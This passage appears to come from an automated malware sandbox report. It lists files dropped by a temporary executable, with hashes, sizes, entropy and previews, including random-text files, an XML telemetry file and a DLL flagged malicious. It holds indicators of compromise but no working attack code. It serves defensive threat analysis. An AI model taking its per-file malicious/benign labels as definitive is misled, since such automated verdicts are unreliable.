                                                                                                                                                                                                                            Entropy (8bit):4.462367415373103
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zs3Jg77aI9b4WpW8VYW85Ym8M4JbvhmRO3FmPu+q8vChmROjSEBumzVz1:uIjfZI7tx7VCoJEjPuKnVEYwdfd
                                                                                                                                                                                                                            MD5:C704232274FB1868E8A7DB51265C7E1A
                                                                                                                                                                                                                            SHA1:C84CD821432B13596F0F872943EB60B609A267FB
                                                                                                                                                                                                                            SHA-256:E4FF1AA15FACD24CACDBD2310DEACF430F882956EBDB89D8E2406C46C94B63F5
                                                                                                                                                                                                                            SHA-512:B4E6507F39AE52A72BD42CC542AD41F760FAA221EE2F98F632D65243FFAF197C3A86A88C2D91000246169686CA8D969E990E444CB1C04D3942B6177C0E4B3D28
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295087" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                            MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                            SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                            SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                            SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                            MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                            SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                            SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                            SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                            MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                            SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                            SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                            SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.696913287597031
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                                                                                                                                                                                                            MD5:44ECF9E98785299129B35CBDBCAB909B
                                                                                                                                                                                                                            SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                                                                                                                                                                                                            SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                                                                                                                                                                                                            SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.69422273140364
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                                                            MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                                                            SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                                                            SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                                                            SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: mJVVW85CnW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Vk2yYa9dHl.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: MBSetup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):331
                                                                                                                                                                                                                            Entropy (8bit):5.181418653672126
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:BMKLwP4qtaAgrCYNP4HmLIYvgBtXQDP40RHB1JC29TOI0XY4eA:fKaXCYAmkYvgLXa/9673
                                                                                                                                                                                                                            MD5:E5613B7939E5C33D9BC1EE077FC983DA
                                                                                                                                                                                                                            SHA1:589200C5C874B729541B93C32946FD24DEBA4768
                                                                                                                                                                                                                            SHA-256:03DF2120FCC9B2596A66EAF48D9C31077EEF682DA198D7519BC28A0BCA731E97
